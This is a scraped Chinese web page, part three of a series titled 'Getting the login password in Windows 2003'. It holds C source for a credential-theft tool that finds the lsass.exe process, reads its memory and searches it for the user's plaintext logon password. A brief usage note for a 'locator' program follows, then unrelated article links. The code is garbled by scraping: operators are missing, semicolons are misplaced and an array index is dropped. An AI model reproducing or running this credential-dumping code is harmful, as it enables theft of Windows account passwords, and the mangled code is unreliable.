在win 2003中得到登陆密码( 三 ) _云知道

{
OffSet= strlen("Procedure")1;
if (strnicmp(&Buffer[iOffSet]，"Call"，strlen("Call")) == 0)
{
i= OffSet;
break;
}
}
}
}
}
}
if (i < nSize)
{
ZeroMemory(Password，sizeof(Password));
for (; i < nSize ; i)
{
if (Buffer == 0x02 && Buffer[i1] == 0 && Buffer[i2] == 0 && Buffer[i3] == 0 && Buffer[i4] == 0 && Buffer[i5] == 0 && Buffer[i6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format，So We Will Do It In
That Way
*/
j = i7;
for (; j < nSize; j= 2)
{
if (Buffer[j] >0)
{
Password[Count] = Buffer[j];
}
else
{
break;
}
}
return i7 // One Flag To Indicate We Find The Password
}
}
}
return -1 // Well，We Fail To Find The Password，And This Always Happens
}
// End Search
//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters:; None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS， 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shotn");
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hProcessSnap， &pe32))
{
CloseHandle(hProcessSnap);;;// Must clean up the snapshot object!
return 0;
}
do
{
if (strcmpi(pe32.szExeFile，"Lsass.EXE") == 0)
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap， &pe32));
CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()
//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:;;
//In: DWORD PID;;;;;-> The Lsass.exe"s PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
charBuffer[5 * 1024] = ;
DWORD; ByteGet = 0;
int;Found = -1;
hProcess = OpenProcess(PROCESS_VM_READ，FALSE，PID) // Open Process
if (hProcess == NULL)
{
printf("Fail To Open Processn");
return FALSE;
}
if (!ReadProcessMemory(hProcess，(PVOID)BaseAddress，Buffer，5 * 1024，&ByteGet));;;;;// Read The Memory From Lsass.exe
{
printf("Fail To Read Memoryn");
CloseHandle(hProcess);
return FALSE;
}
CloseHandle(hProcess);

Found = Search(Buffer，ByteGet) // Search The Password
if (Found >= 0);;;;;// We May Find The Password
{
if (strlen(Password) > 0);;;;;// Yes，We Find The Password Even We Don"t Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> "%s"n"，FoundBaseAddress，Password);
}
}
else
{
printf("Fail To Find The Passwordn");
}
return TRUE;
}
// End FindPassword
//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters:; None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi，sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File
附件程序相当于密码定位程序，用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.
用法:
1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串"，返回确定的位置

在win 2003中得到登陆密码( 三 )

推荐阅读

上海5700变形金刚版购买小结

鸡群觅食图简笔画步骤鸡群觅食图简笔画教程

小青菜的营养价值

魔鬼鱼简笔画魔鬼鱼简笔画怎么画

咖啡牙美白做完要多久时间？

水葫芦一年开几次花水葫芦一年开几次花

陕西序贯加强免疫接种安全性如何

2022北京寒衣节在路边可以烧纸吗寒衣节什么时候烧纸

索爱W850c手机一个小技巧

C语言中，%d是什么意思 c语言字符串转换成数字方法

猫怎么会得猫瘟？八个月的猫怎么会得猫瘟

太空船废墟怎么打,从一个点开始的太空史诗

宠物猫种类大盘点，快来集合吧

过夜的咖啡还可以喝吗

房价高可以投资吗为什么，现在房产还适合投资吗

映客为什么人越来越少,交谊舞厅也越来越少了